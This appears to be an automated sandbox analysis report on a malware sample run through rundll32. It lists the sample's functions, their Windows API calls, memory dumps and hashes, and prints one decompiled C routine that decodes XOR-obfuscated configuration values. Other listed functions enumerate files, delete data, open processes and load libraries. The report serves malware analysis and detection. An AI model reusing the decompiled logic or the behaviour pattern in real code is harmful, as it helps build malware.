                            • Instruction Fuzzy Hash: 92E01234240118B7FB10BE54DC55F997B54EF04758F008015BE09AE241DE72F6A1D791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F81E9D Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                            Download Yara Rule
                            APIs
                            • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,04F860E0,0000002C,04F790D3,06318E36,?,00000000,04F7A484,?,00000318), ref: 04F81EB7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeVirtual
                            • String ID:
                            • API String ID: 1263568516-0
                            • Opcode ID: 61a5fbde864181eab00533d4f779b8546d5981d9f904aede7472e7e6899c5e5b
                            • Instruction ID: 0cf25a8543624c174992e0cf454f0f4a1cba434b5dc1a0fe1f221ecf4a90addd
                            • Opcode Fuzzy Hash: 61a5fbde864181eab00533d4f779b8546d5981d9f904aede7472e7e6899c5e5b
                            • Instruction Fuzzy Hash: 97D01731E00219EBCB20AF94DC4999EFB70BF08720F608228E8607B1A0C7342D16CF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 04F7BAD1 Relevance: 28.7, APIs: 19, Instructions: 234stringfilesynchronizationCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                              • Part of subcall function 04F721B6: ExpandEnvironmentStringsW.KERNEL32(04F6AEB5,00000000,00000000,00000001,00000000,00000000,04F6E448,04F6AEB5,00000000,04F6E448,?), ref: 04F721CD
                              • Part of subcall function 04F721B6: ExpandEnvironmentStringsW.KERNEL32(04F6AEB5,00000000,00000000,00000000), ref: 04F721E7
                            • lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 04F7BB1D
                            • lstrlenW.KERNEL32(?,?,00000000), ref: 04F7BB29
                            • memset.NTDLL ref: 04F7BB71
                            • FindFirstFileW.KERNEL32(00000000,00000000), ref: 04F7BB8C
                            • lstrlenW.KERNEL32(0000002C), ref: 04F7BBC4
                            • lstrlenW.KERNEL32(?), ref: 04F7BBCC
                            • memset.NTDLL ref: 04F7BBEF
                            • wcscpy.NTDLL ref: 04F7BC01
                            • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04F7BC27
                            • RtlEnterCriticalSection.NTDLL(?), ref: 04F7BC5D
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04F7BC79
                            • FindNextFileW.KERNEL32(?,00000000), ref: 04F7BC92
                            • WaitForSingleObject.KERNEL32(00000000), ref: 04F7BCA4
                            • FindClose.KERNEL32(?), ref: 04F7BCB9
                            • FindFirstFileW.KERNEL32(00000000,00000000), ref: 04F7BCCD
                            • lstrlenW.KERNEL32(0000002C), ref: 04F7BCEF
                            • FindNextFileW.KERNEL32(?,00000000), ref: 04F7BD65
                            • WaitForSingleObject.KERNEL32(00000000), ref: 04F7BD77
                            • FindClose.KERNEL32(?), ref: 04F7BD92
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                            • String ID:
                            • API String ID: 2962561936-0
                            • Opcode ID: 06649ca3ee3394802842a486b4d04344d635a9bd8ba5f0e3b2eba2af20ff43b0
                            • Instruction ID: 73699c698bd859cd8ddf203f316ef4be8b4ee3b0322e2a7dd0a74744f9e128ed
                            • Opcode Fuzzy Hash: 06649ca3ee3394802842a486b4d04344d635a9bd8ba5f0e3b2eba2af20ff43b0
                            • Instruction Fuzzy Hash: 8A815C71904349AFD711AF64DC84A2BBBE8FF89308F04881EF99596151DB78F806CF52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6B238 Relevance: 18.5, APIs: 12, Instructions: 519memoryCOMMON
                            Download Yara Rule
                            APIs
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B270
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B2A2
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B2D4
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B306
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B338
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B36A
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B39C
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B3CE
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B400
                            • HeapFree.KERNEL32(00000000,?,?,?,?,7620F710,00000000,00000000), ref: 04F6B593
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,?,?,?,7620F710,00000000,00000000), ref: 04F6B637
                              • Part of subcall function 04F77736: RtlAllocateHeap.NTDLL ref: 04F77777
                              • Part of subcall function 04F77736: memset.NTDLL ref: 04F7778B
                              • Part of subcall function 04F77736: GetCurrentThreadId.KERNEL32 ref: 04F77818
                              • Part of subcall function 04F77736: GetCurrentThread.KERNEL32 ref: 04F7782B
                              • Part of subcall function 04F66537: RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F66540
                              • Part of subcall function 04F66537: HeapFree.KERNEL32(00000000,?), ref: 04F66572
                              • Part of subcall function 04F66537: RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F66590
                            • HeapFree.KERNEL32(00000000,?,?,?,?,7620F710,00000000,00000000), ref: 04F6B5DF
                              • Part of subcall function 04F6D4DA: lstrlen.KERNEL32(?,00000000,761B6980,00000000,04F6DA7B,?), ref: 04F6D4E3
                              • Part of subcall function 04F6D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 04F6D506
                              • Part of subcall function 04F6D4DA: memset.NTDLL ref: 04F6D515
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$CriticalCurrentSectionThreadmemset$AllocateEnterLeavelstrlenmemcpy
                            • String ID:
                            • API String ID: 3296958911-0
                            • Opcode ID: 6467d56c73859db1bbdaa86c0436a266d88d01349db43308e65e0df59dceae26
                            • Instruction ID: 04540cfceef2c47400e4daa7b72529390f96701594443fcbc575448a2f919dfa
                            • Opcode Fuzzy Hash: 6467d56c73859db1bbdaa86c0436a266d88d01349db43308e65e0df59dceae26
                            • Instruction Fuzzy Hash: ADF163B2F10529ABDB10FF74EC84D7F33E9DB08644715496AA902DB204EA38FD439B65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F610C7 Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON
                            Download Yara Rule
                            APIs
                            • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 04F610FA
                            • GetLastError.KERNEL32 ref: 04F61108
                            • NtSetInformationProcess.NTDLL ref: 04F61162
                            • GetProcAddress.KERNEL32(?,00000000), ref: 04F611A1
                            • GetProcAddress.KERNEL32(?), ref: 04F611C2
                            • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 04F61219
                            • CloseHandle.KERNEL32(?), ref: 04F6122F
                            • CloseHandle.KERNEL32(?), ref: 04F61255
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                            • String ID:
                            • API String ID: 3529370251-0
                            • Opcode ID: f9207cf075c74cbd8bca648fe3ad6010e180d6ec832f94ddb7a20e4071292c53
                            • Instruction ID: b0313d941f3b2e883c08d652df62269fff379fa02b48b7ee3782be5e999b519d
                            • Opcode Fuzzy Hash: f9207cf075c74cbd8bca648fe3ad6010e180d6ec832f94ddb7a20e4071292c53
                            • Instruction Fuzzy Hash: AB416C71904349AFD7119F64ED48A2ABBF8FB88308F004A2EF556D6110D774EA4ACB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6FD47 Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • wcscpy.NTDLL ref: 04F6FD7B
                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 04F6FD87
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F6FD98
                            • memset.NTDLL ref: 04F6FDB5
                            • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 04F6FDC3
                            • WaitForSingleObject.KERNEL32(00000000), ref: 04F6FDD1
                            • GetDriveTypeW.KERNEL32(?), ref: 04F6FDDF
                            • lstrlenW.KERNEL32(?), ref: 04F6FDEB
                            • wcscpy.NTDLL ref: 04F6FDFD
                            • lstrlenW.KERNEL32(?), ref: 04F6FE17
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6FE30
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                            • String ID:
                            • API String ID: 3888849384-0
                            • Opcode ID: 9c1eed9129bbfa59f557cc055afeb5fd479771a98f925e480f6c6ea6772654d6
                            • Instruction ID: e506fcaad9c588920d547b61bb5cc21d331d98009fa8298bb82de16593d27b89
                            • Opcode Fuzzy Hash: 9c1eed9129bbfa59f557cc055afeb5fd479771a98f925e480f6c6ea6772654d6
                            • Instruction Fuzzy Hash: A0312D76C0010DFFDB119FA4EC84CEEBBBDEB09358B10446AF501EA111E739AE559B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F699BC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109filestringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenW.KERNEL32(?,00000000), ref: 04F699D4
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 04F69A3D
                            • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 04F69A65
                            • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 04F69AB7
                            • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 04F69AC2
                            • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 04F69AD5
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                            • String ID:
                            • API String ID: 499515686-3916222277
                            • Opcode ID: da7b3e4d17b98703d6a5a7d81680f016dabb7a79fed23211fbd8d946eb55cef5
                            • Instruction ID: 092674a7016258c60abd9ae7c69bb1f49840ed5bbab18bf0d1006ab9c0ba323b
                            • Opcode Fuzzy Hash: da7b3e4d17b98703d6a5a7d81680f016dabb7a79fed23211fbd8d946eb55cef5
                            • Instruction Fuzzy Hash: C6412FB1D0020AFFDF119FA4DD89EAE7BB8FF00314F104559E512AA190EBB4AA45DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6EC00 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87registrylibraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 04F6EC1B
                            • RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 04F6ECD3
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 04F6EC69
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F6EC82
                            • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 04F6ECA1
                            • FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 04F6ECB3
                            • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 04F6ECBB
                            Strings
                            • Software\Microsoft\WAB\DLLPath, xrefs: 04F6EC0C
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                            • String ID: Software\Microsoft\WAB\DLLPath
                            • API String ID: 1628847533-3156921957
                            • Opcode ID: 33e3c7a2d178c4de759bc9d941c23b6bb9ff924538352ac0fa6f66b2f43e7f59
                            • Instruction ID: af9b86c3fe55c6972bffd0096206263e52d3c7c34f51a8391d229b66752b1a6a
                            • Opcode Fuzzy Hash: 33e3c7a2d178c4de759bc9d941c23b6bb9ff924538352ac0fa6f66b2f43e7f59
                            • Instruction Fuzzy Hash: A5216277A00518FFDB11AFA8ED88CBEBF7DEB84711B100165F802AB210E6756E42DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A11645 Relevance: 12.3, APIs: 8, Instructions: 258memoryCOMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E04A11645(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x4a1a344; // 0x69b25f44
				if(E04A17780( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x4a1a378 = _v8;
				}
				_t33 =  *0x4a1a344; // 0x69b25f44
				if(E04A17780( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x4a1a344; // 0x69b25f44
				_push(_t115);
				if(E04A17780( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x4a1a2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x4a1a344; // 0x69b25f44
						_t45 = E04A15450(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x4a1a2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x4a1a344; // 0x69b25f44
						_t46 = E04A15450(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x4a1a2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x4a1a344; // 0x69b25f44
						_t47 = E04A15450(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x4a1a2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x4a1a344; // 0x69b25f44
						_t48 = E04A15450(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x4a1a004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x4a1a344; // 0x69b25f44
						_t49 = E04A15450(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x4a1a02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x4a1a344; // 0x69b25f44
						_t50 = E04A15450(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x4a1a2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x4a1a344; // 0x69b25f44
								_t51 = E04A15450(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E04A12FBC(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E04A172C7();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x4a1a344; // 0x69b25f44
								_t52 = E04A15450(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E04A12FBC(0, _t52) != 0) {
								_t121 =  *0x4a1a3cc; // 0x55395b0
								E04A1765B(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x4a1a344; // 0x69b25f44
								_t53 = E04A15450(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x4a1a348; // 0xb1d5a8
								_t22 = _t54 + 0x4a1b252; // 0x616d692f
								 *0x4a1a374 = _t22;
								goto L60;
							} else {
								_t64 = E04A12FBC(0, _t53);
								 *0x4a1a374 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x4a1a344; // 0x69b25f44
										_t56 = E04A15450(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x4a1a348; // 0xb1d5a8
										_t23 = _t57 + 0x4a1b79e; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E04A12FBC(0, _t56);
									}
									 *0x4a1a3e0 = _t58;
									HeapFree( *0x4a1a2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































                            0x04a11645
                            0x04a11645
                            0x04a11645
                            0x04a11645
                            0x04a11648
                            0x04a11665
                            0x04a11673
                            0x04a11673
                            0x04a11678
                            0x04a11692
                            0x04a11900
                            0x04a11907
                            0x04a1190b
                            0x04a1190b
                            0x04a11698
                            0x04a1169d
                            0x04a116b5
                            0x04a118ed
                            0x04a118f7
                            0x00000000
                            0x04a116bb
                            0x04a116bb
                            0x04a116bc
                            0x04a116c1
                            0x04a116d7
                            0x04a116c3
                            0x04a116c3
                            0x04a116d0
                            0x04a116d0
                            0x04a116d9
                            0x04a116e2
                            0x04a116e4
                            0x04a116ee
                            0x04a116f3
                            0x04a116f3
                            0x04a116ee
                            0x04a116fa
                            0x04a11710
                            0x04a116fc
                            0x04a116fc
                            0x04a11709
                            0x04a11709
                            0x04a11714
                            0x04a11716
                            0x04a11720
                            0x04a11725
                            0x04a11725
                            0x04a11720
                            0x04a1172c
                            0x04a11742
                            0x04a1172e
                            0x04a1172e
                            0x04a1173b
                            0x04a1173b
                            0x04a11746
                            0x04a11748
                            0x04a11752
                            0x04a11757
                            0x04a11757
                            0x04a11752
                            0x04a1175e
                            0x04a11774
                            0x04a11760
                            0x04a11760
                            0x04a1176d
                            0x04a1176d
                            0x04a11778
                            0x04a1177a
                            0x04a11784
                            0x04a11789
                            0x04a11789
                            0x04a11784
                            0x04a11790
                            0x04a117a6
                            0x04a11792
                            0x04a11792
                            0x04a1179f
                            0x04a1179f
                            0x04a117aa
                            0x04a117ac
                            0x04a117b6
                            0x04a117bb
                            0x04a117bb
                            0x04a117b6
                            0x04a117c2
                            0x04a117d8
                            0x04a117c4
                            0x04a117c4
                            0x04a117d1
                            0x04a117d1
                            0x04a117dc
                            0x04a117ef
                            0x04a117ef
                            0x00000000
                            0x04a117de
                            0x04a117de
                            0x04a117e8
                            0x00000000
                            0x04a117f9
                            0x04a117f9
                            0x04a117fb
                            0x04a11811
                            0x04a117fd
                            0x04a117fd
                            0x04a1180a
                            0x04a1180a
                            0x04a11815
                            0x04a11817
                            0x04a1181a
                            0x04a1181b
                            0x04a11822
                            0x04a11824
                            0x04a11825
                            0x04a11825
                            0x04a11822
                            0x04a1182c
                            0x04a11842
                            0x04a1182e
                            0x04a1182e
                            0x04a1183b
                            0x04a1183b
                            0x04a11846
                            0x04a11854
                            0x04a1185e
                            0x04a1185e
                            0x04a11866
                            0x04a1187c
                            0x04a11868
                            0x04a11868
                            0x04a11875
                            0x04a11875
                            0x04a11880
                            0x04a11893
                            0x04a11893
                            0x04a11898
                            0x04a1189e
                            0x00000000
                            0x04a11882
                            0x04a11885
                            0x04a1188a
                            0x04a11891
                            0x04a118a3
                            0x04a118a5
                            0x04a118bb
                            0x04a118a7
                            0x04a118a7
                            0x04a118b4
                            0x04a118b4
                            0x04a118bf
                            0x04a118cb
                            0x04a118d0
                            0x04a118d0
                            0x04a118c1
                            0x04a118c4
                            0x04a118c4
                            0x04a118de
                            0x04a118e3
                            0x04a118e9
                            0x00000000
                            0x04a118ec
                            0x00000000
                            0x04a11891
                            0x04a11880
                            0x04a117e8
                            0x04a117dc

                            APIs
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,04A1A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04A116EA
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,04A1A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04A1171C
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,04A1A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04A1174E
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,04A1A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04A11780
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,04A1A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04A117B2
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,04A1A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04A117E4
                            • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04A118E3
                            • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04A118F7
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: f1f321efa1dc3e14bab06c5e9d81083f1d6c2d08d5f9ea894df2256277e8ad29
                            • Instruction ID: cc1bcce3cb945c8e9e4c37fa1ed124b4a214d4f8df9e0502c55306257f0aadba
                            • Opcode Fuzzy Hash: f1f321efa1dc3e14bab06c5e9d81083f1d6c2d08d5f9ea894df2256277e8ad29
                            • Instruction Fuzzy Hash: 1081A0B8B11214ABDB11EBB4DA84E9B73EDEB9C6447284D25E201D7230F639FD418B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F665C2 Relevance: 12.1, APIs: 8, Instructions: 111stringfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F68669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,04F62028,?), ref: 04F6867A
                              • Part of subcall function 04F68669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,04F62028,?), ref: 04F68697
                            • FreeLibrary.KERNEL32(?), ref: 04F666F8
                              • Part of subcall function 04F7AFC2: lstrlenW.KERNEL32(?,00000000,?,?,?,04F6663D,?,?), ref: 04F7AFCF
                              • Part of subcall function 04F7AFC2: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,04F6663D,?,?), ref: 04F7AFF8
                              • Part of subcall function 04F7AFC2: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 04F7B018
                              • Part of subcall function 04F7AFC2: lstrcpyW.KERNEL32(-00000002,?), ref: 04F7B034
                              • Part of subcall function 04F7AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,04F6663D,?,?), ref: 04F7B040
                              • Part of subcall function 04F7AFC2: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,04F6663D,?,?), ref: 04F7B043
                              • Part of subcall function 04F7AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,04F6663D,?,?), ref: 04F7B04F
                              • Part of subcall function 04F7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 04F7B06C
                              • Part of subcall function 04F7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 04F7B086
                              • Part of subcall function 04F7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 04F7B09C
                              • Part of subcall function 04F7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 04F7B0B2
                              • Part of subcall function 04F7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 04F7B0C8
                              • Part of subcall function 04F7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 04F7B0DE
                            • FindFirstFileW.KERNEL32(?,?,?,?), ref: 04F6664E
                            • lstrlenW.KERNEL32(?), ref: 04F6666A
                            • lstrlenW.KERNEL32(?), ref: 04F66682
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • lstrcpyW.KERNEL32(00000000,?), ref: 04F6669B
                            • lstrcpyW.KERNEL32(00000002), ref: 04F666B0
                              • Part of subcall function 04F81C9B: lstrlenW.KERNEL32(?,00000000,761F8250,761B69A0,?,?,?,04F666C0,?,00000000,?), ref: 04F81CAB
                              • Part of subcall function 04F81C9B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,04F666C0,?,00000000,?), ref: 04F81CCD
                              • Part of subcall function 04F81C9B: lstrcpyW.KERNEL32(00000000,?), ref: 04F81CF9
                              • Part of subcall function 04F81C9B: lstrcatW.KERNEL32(00000000,?), ref: 04F81D0C
                            • FindNextFileW.KERNEL32(?,00000010), ref: 04F666D8
                            • FindClose.KERNEL32(00000002), ref: 04F666E6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                            • String ID:
                            • API String ID: 1209511739-0
